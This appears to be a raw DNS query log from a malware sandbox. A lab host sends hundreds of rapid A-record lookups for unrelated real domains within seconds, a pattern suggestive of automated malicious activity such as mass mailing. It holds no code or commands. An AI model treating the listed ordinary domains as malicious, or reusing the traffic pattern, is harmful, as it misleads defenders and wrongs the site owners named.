                                                                                                                                                                              Sep 15, 2023 07:28:17.090262890 CEST192.168.2.38.8.8.80x63c0Standard query (0)bd-style.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.090262890 CEST192.168.2.38.8.8.80xeb96Standard query (0)www.vazir.seA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.090262890 CEST192.168.2.38.8.8.80xbd25Standard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.153019905 CEST192.168.2.38.8.8.80xefd1Standard query (0)coxkitchensandbaths.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.160310030 CEST192.168.2.38.8.8.80x6850Standard query (0)rast.seA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.168498039 CEST192.168.2.38.8.8.80x6fc2Standard query (0)fortknox.bmA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.188314915 CEST192.168.2.38.8.8.80x96eaStandard query (0)averwin.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.193125010 CEST192.168.2.38.8.8.80x6db6Standard query (0)angework.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.199434996 CEST192.168.2.38.8.8.80xbb98Standard query (0)shittas.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.202332020 CEST192.168.2.38.8.8.80x78b0Standard query (0)someikan.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.230807066 CEST192.168.2.38.8.8.80x243aStandard query (0)pro-fa.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.247621059 CEST192.168.2.38.8.8.80x45edStandard query (0)magicomm.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.247992039 CEST192.168.2.38.8.8.80xf7d7Standard query (0)agulatex.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.261898041 CEST192.168.2.38.8.8.80xcd2Standard query (0)adventist.roA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.278495073 CEST192.168.2.38.8.8.80xf7dcStandard query (0)kavram.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.278878927 CEST192.168.2.38.8.8.80x71c5Standard query (0)reproar.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.293709993 CEST192.168.2.38.8.8.80x68a7Standard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.324420929 CEST192.168.2.38.8.8.80xdfc7Standard query (0)slower.itA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.329426050 CEST192.168.2.38.8.8.80x61bfStandard query (0)pro-fa.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.339737892 CEST192.168.2.38.8.8.80x4e80Standard query (0)orlyhotel.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.353168964 CEST192.168.2.38.8.8.80xd9f0Standard query (0)com-edit.frA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.356863976 CEST192.168.2.38.8.8.80xc87dStandard query (0)kairel.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.370930910 CEST192.168.2.38.8.8.80x9aStandard query (0)k-nikko.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.402862072 CEST192.168.2.38.8.8.80x7563Standard query (0)epc.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.432005882 CEST192.168.2.38.8.8.80xdfcfStandard query (0)peminet.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.434144020 CEST192.168.2.38.8.8.80x38f3Standard query (0)insia.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.465214014 CEST192.168.2.38.8.8.80xac2Standard query (0)banvari.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.496575117 CEST192.168.2.38.8.8.80x1b61Standard query (0)absblast.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.514090061 CEST192.168.2.38.8.8.80xb2f0Standard query (0)pro-fa.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.527879953 CEST192.168.2.38.8.8.80xa27Standard query (0)impexnc.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.528294086 CEST192.168.2.38.8.8.80x14adStandard query (0)hamaker.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.533432961 CEST192.168.2.38.8.8.80x8db8Standard query (0)www.muhr-soehne.deA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.575473070 CEST192.168.2.38.8.8.80x54a2Standard query (0)106west.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.607855082 CEST192.168.2.38.8.8.80x9492Standard query (0)camamat.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.608609915 CEST192.168.2.38.8.8.80xa3c8Standard query (0)awal.wsA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.609085083 CEST192.168.2.38.8.8.80xf3eaStandard query (0)wantapc.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.617888927 CEST192.168.2.38.8.8.80xe05Standard query (0)yasuma.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.622765064 CEST192.168.2.38.8.8.80x76bStandard query (0)metaforacom.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.626426935 CEST192.168.2.38.8.8.80xa722Standard query (0)slower.itA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.682744026 CEST192.168.2.38.8.8.80x2168Standard query (0)n23china.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.715867043 CEST192.168.2.38.8.8.80x98c0Standard query (0)mackusick.deA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.720686913 CEST192.168.2.38.8.8.80x48deStandard query (0)dataform.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.730705976 CEST192.168.2.38.8.8.80x84b2Standard query (0)angework.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.762234926 CEST192.168.2.38.8.8.80x4651Standard query (0)hazmatt.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.767570019 CEST192.168.2.38.8.8.80x3539Standard query (0)sledsport.ruA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.809020996 CEST192.168.2.38.8.8.80x7154Standard query (0)adeesa.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.809237957 CEST192.168.2.38.8.8.80xc35bStandard query (0)pleszew.policja.gov.plA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.825809956 CEST192.168.2.38.8.8.80x9c59Standard query (0)polprime.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.860063076 CEST192.168.2.38.8.8.80x532cStandard query (0)slower.itA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.903745890 CEST192.168.2.38.8.8.80x9c96Standard query (0)clinicasanluis.com.coA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.915718079 CEST192.168.2.38.8.8.80x2c15Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.918179989 CEST192.168.2.38.8.8.80x2e83Standard query (0)e-kami.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.930711031 CEST192.168.2.38.8.8.80x7a0bStandard query (0)polprime.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.934356928 CEST192.168.2.38.8.8.80xd1fStandard query (0)assideum.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.934984922 CEST192.168.2.38.8.8.80x7046Standard query (0)revoldia.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.965338945 CEST192.168.2.38.8.8.80x2c44Standard query (0)ntc.edu.auA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.996612072 CEST192.168.2.38.8.8.80xda9dStandard query (0)indonesiamedia.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.002199888 CEST192.168.2.38.8.8.80xd5c0Standard query (0)n23china.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.002966881 CEST192.168.2.38.8.8.80x15ddStandard query (0)k-nikko.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.043112993 CEST192.168.2.38.8.8.80xfe2aStandard query (0)bount.com.twA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.052578926 CEST192.168.2.38.8.8.80x5c50Standard query (0)polprime.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.060363054 CEST192.168.2.38.8.8.80x8881Standard query (0)4locals.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.060549021 CEST192.168.2.38.8.8.80x2232Standard query (0)skgm.ruA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.087642908 CEST192.168.2.38.8.8.80x63c0Standard query (0)bd-style.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.090169907 CEST192.168.2.38.8.8.80xbe86Standard query (0)wahw.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.092545986 CEST192.168.2.38.8.8.80x7de6Standard query (0)stopllc.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.100150108 CEST192.168.2.38.8.8.80xe6aeStandard query (0)n23china.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.103360891 CEST192.168.2.38.8.8.80xeb96Standard query (0)www.vazir.seA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.106134892 CEST192.168.2.38.8.8.80x650aStandard query (0)agitz.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.119709015 CEST192.168.2.38.8.8.80xd56fStandard query (0)captlfix.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.121689081 CEST192.168.2.38.8.8.80x604cStandard query (0)biosolve.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.153211117 CEST192.168.2.38.8.8.80x5833Standard query (0)bossinst.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.174742937 CEST192.168.2.38.8.8.80x2652Standard query (0)kairel.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.185478926 CEST192.168.2.38.8.8.80x4801Standard query (0)dbnet.atA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.205360889 CEST192.168.2.38.8.8.80xaef0Standard query (0)agitz.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.216691017 CEST192.168.2.38.8.8.80x9079Standard query (0)canmore.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.217247009 CEST192.168.2.38.8.8.80xc77cStandard query (0)techtrans.deA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.278732061 CEST192.168.2.38.8.8.80xf085Standard query (0)strazynski.plA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.291189909 CEST192.168.2.38.8.8.80xd76eStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.291891098 CEST192.168.2.38.8.8.80x5b56Standard query (0)mail.airmail.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.302910089 CEST192.168.2.38.8.8.80x116aStandard query (0)agitz.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.312117100 CEST192.168.2.38.8.8.80xa82Standard query (0)eos-i.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.315063000 CEST192.168.2.38.8.8.80x8910Standard query (0)siongann.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.315063000 CEST192.168.2.38.8.8.80xe5a4Standard query (0)zugseil.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.337757111 CEST192.168.2.38.8.8.80x9d73Standard query (0)canmore.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.371956110 CEST192.168.2.38.8.8.80x39c6Standard query (0)diamir.deA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.371956110 CEST192.168.2.38.8.8.80xd9f0Standard query (0)com-edit.frA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.388539076 CEST192.168.2.38.8.8.80x1022Standard query (0)cnti.krsn.ruA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.401583910 CEST192.168.2.38.8.8.80x34e5Standard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.410402060 CEST192.168.2.38.8.8.80x5176Standard query (0)eos-i.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.449048042 CEST192.168.2.38.8.8.80xcd85Standard query (0)canmore.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.465585947 CEST192.168.2.38.8.8.80xcac1Standard query (0)sinwal.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.467158079 CEST192.168.2.38.8.8.80x8b5Standard query (0)assideum.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.481074095 CEST192.168.2.38.8.8.80x176eStandard query (0)cjborden.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.509713888 CEST192.168.2.38.8.8.80x2f3bStandard query (0)eos-i.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.559576035 CEST192.168.2.38.8.8.80xe45aStandard query (0)hyab.seA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.576112032 CEST192.168.2.38.8.8.80x8fe6Standard query (0)oozkranj.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.593971014 CEST192.168.2.38.8.8.80x468fStandard query (0)pccj.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.656112909 CEST192.168.2.38.8.8.80x513Standard query (0)mackusick.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.684627056 CEST192.168.2.38.8.8.80xd81aStandard query (0)ascc.org.auA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.698124886 CEST192.168.2.38.8.8.80x4ab4Standard query (0)calvinly.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.714802027 CEST192.168.2.38.8.8.80xff40Standard query (0)amerifor.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.746876955 CEST192.168.2.38.8.8.80xa3f0Standard query (0)sigtoa.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.792526960 CEST192.168.2.38.8.8.80xdbd4Standard query (0)floopis.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.802313089 CEST192.168.2.38.8.8.80x88abStandard query (0)n23china.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.825246096 CEST192.168.2.38.8.8.80x3fd9Standard query (0)ncn.deA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.836107016 CEST192.168.2.38.8.8.80xdd00Standard query (0)reproar.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.844111919 CEST192.168.2.38.8.8.80x1b99Standard query (0)kavram.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.844111919 CEST192.168.2.38.8.8.80x3070Standard query (0)xult.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.845135927 CEST192.168.2.38.8.8.80x8a87Standard query (0)atb-lit.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.856128931 CEST192.168.2.38.8.8.80xdf6cStandard query (0)aoinko.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.873019934 CEST192.168.2.38.8.8.80x2104Standard query (0)gcss.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.873569965 CEST192.168.2.38.8.8.80xae4eStandard query (0)epc.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.889317989 CEST192.168.2.38.8.8.80xdac1Standard query (0)gphpedit.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.902666092 CEST192.168.2.38.8.8.80xcf6aStandard query (0)n23china.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.936114073 CEST192.168.2.38.8.8.80x2c15Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.956548929 CEST192.168.2.38.8.8.80xad8eStandard query (0)touchfam.caA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:18.996107101 CEST192.168.2.38.8.8.80xb23dStandard query (0)www.clinicasanluis.com.coA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:19.006316900 CEST192.168.2.38.8.8.80x1d64Standard query (0)n23china.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:19.028109074 CEST192.168.2.38.8.8.80xfec6Standard query (0)scintel.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:19.035278082 CEST192.168.2.38.8.8.80x3d39Standard query (0)invictus.plA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:19.041812897 CEST192.168.2.38.8.8.80x7cb9Standard query (0)nme.co.jpA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:19.090620041 CEST192.168.2.38.8.8.80x82dStandard query (0)amic.atA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:19.107122898 CEST192.168.2.38.8.8.80x3e05Standard query (0)valselit.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:19.152462959 CEST192.168.2.38.8.8.80x8eb1Standard query (0)someikan.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:19.185254097 CEST192.168.2.38.8.8.80xfda9Standard query (0)snf.itA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:19.217077971 CEST192.168.2.38.8.8.80xc013Standard query (0)shteeble.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:19.217077971 CEST192.168.2.38.8.8.80x7bd3Standard query (0)78san.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:19.233145952 CEST192.168.2.38.8.8.80xaa9aStandard query (0)snf.itA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:19.247509003 CEST192.168.2.38.8.8.80xe10Standard query (0)cyclad.plA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:19.277898073 CEST192.168.2.38.8.8.80xc455Standard query (0)riwn.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:19.298876047 CEST192.168.2.38.8.8.80x571cStandard query (0)avse.huA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:19.326993942 CEST192.168.2.38.8.8.80xd9efStandard query (0)refintl.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:19.329169035 CEST192.168.2.38.8.8.80x165dStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:19.344494104 CEST192.168.2.38.8.8.80x15eStandard query (0)invictus.plA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:19.374699116 CEST192.168.2.38.8.8.80xf737Standard query (0)from30ty.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:19.418853998 CEST192.168.2.38.8.8.80x42dbStandard query (0)kavram.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:19.449860096 CEST192.168.2.38.8.8.80x1f19Standard query (0)agitz.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:19.480725050 CEST192.168.2.38.8.8.80x5e1fStandard query (0)603888.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:19.496946096 CEST192.168.2.38.8.8.80x8b18Standard query (0)ruzee.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:19.551342964 CEST192.168.2.38.8.8.80xfb71Standard query (0)agitz.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:19.643544912 CEST192.168.2.38.8.8.80xa2cStandard query (0)themark.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:19.670653105 CEST192.168.2.38.8.8.80x8c19Standard query (0)xult.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:19.680404902 CEST192.168.2.38.8.8.80x1c63Standard query (0)www.diamir.deA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:19.686863899 CEST192.168.2.38.8.8.80x922aStandard query (0)www.t-tre.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:19.721956968 CEST192.168.2.38.8.8.80x511cStandard query (0)kustnara.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:19.729163885 CEST192.168.2.38.8.8.80xd96bStandard query (0)someikan.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:19.789410114 CEST192.168.2.38.8.8.80x98cfStandard query (0)invictus.plA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:19.791305065 CEST192.168.2.38.8.8.80x70caStandard query (0)agitz.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:19.968456030 CEST192.168.2.38.8.8.80x1ba9Standard query (0)fogra.com.plA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:20.017774105 CEST192.168.2.38.8.8.80xd475Standard query (0)isom.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:20.068761110 CEST192.168.2.38.8.8.80xf999Standard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:20.125644922 CEST192.168.2.38.8.8.80x77b4Standard query (0)xinhui.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:20.202755928 CEST192.168.2.38.8.8.80x18d2Standard query (0)amele.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:20.203469038 CEST192.168.2.38.8.8.80x6161Standard query (0)hbfuels.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:20.228599072 CEST192.168.2.38.8.8.80xaa9aStandard query (0)snf.itA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:20.323244095 CEST192.168.2.38.8.8.80x165dStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:20.326334000 CEST192.168.2.38.8.8.80xfed3Standard query (0)mikihan.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:20.344105005 CEST192.168.2.38.8.8.80x90b8Standard query (0)someikan.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:20.372199059 CEST192.168.2.38.8.8.80x1aabStandard query (0)leapc.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:20.388108015 CEST192.168.2.38.8.8.80xce9fStandard query (0)daytonir.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:20.404105902 CEST192.168.2.38.8.8.80xa1ecStandard query (0)orbitgas.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:20.420105934 CEST192.168.2.38.8.8.80xb7ccStandard query (0)icd-host.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:20.481142998 CEST192.168.2.38.8.8.80x3f11Standard query (0)wnit.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:20.490691900 CEST192.168.2.38.8.8.80xe493Standard query (0)www.cokocoko.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:20.516113043 CEST192.168.2.38.8.8.80x2805Standard query (0)nettlinx.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:20.559024096 CEST192.168.2.38.8.8.80x3748Standard query (0)agitz.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:20.623814106 CEST192.168.2.38.8.8.80x9e7fStandard query (0)shiner.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:20.624474049 CEST192.168.2.38.8.8.80x4650Standard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:20.639818907 CEST192.168.2.38.8.8.80xfb9aStandard query (0)redgiga.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:20.654964924 CEST192.168.2.38.8.8.80xb97dStandard query (0)ikulani.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:20.661434889 CEST192.168.2.38.8.8.80x3ff9Standard query (0)agitz.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:20.730418921 CEST192.168.2.38.8.8.80xc88dStandard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:20.760869980 CEST192.168.2.38.8.8.80x4c6fStandard query (0)agitz.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:20.835469961 CEST192.168.2.38.8.8.80x3b8dStandard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:20.899777889 CEST192.168.2.38.8.8.80xeae6Standard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:20.947134972 CEST192.168.2.38.8.8.80x2c15Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:20.997430086 CEST192.168.2.38.8.8.80xb6bfStandard query (0)tbvlugus.nlA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.006227970 CEST192.168.2.38.8.8.80x22c7Standard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.046917915 CEST192.168.2.38.8.8.80xcac0Standard query (0)www.speelhal.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.130315065 CEST192.168.2.38.8.8.80xa8a5Standard query (0)t-trust.jpA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.130315065 CEST192.168.2.38.8.8.80xff8bStandard query (0)btsi.com.phA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.201560974 CEST192.168.2.38.8.8.80x436fStandard query (0)biurohera.plA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.203118086 CEST192.168.2.38.8.8.80x6614Standard query (0)arowines.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.230998039 CEST192.168.2.38.8.8.80x151aStandard query (0)cjborden.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.279712915 CEST192.168.2.38.8.8.80x42edStandard query (0)cbaben.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.302284002 CEST192.168.2.38.8.8.80x9b94Standard query (0)arowines.comA (IP address)IN (0x0001)false
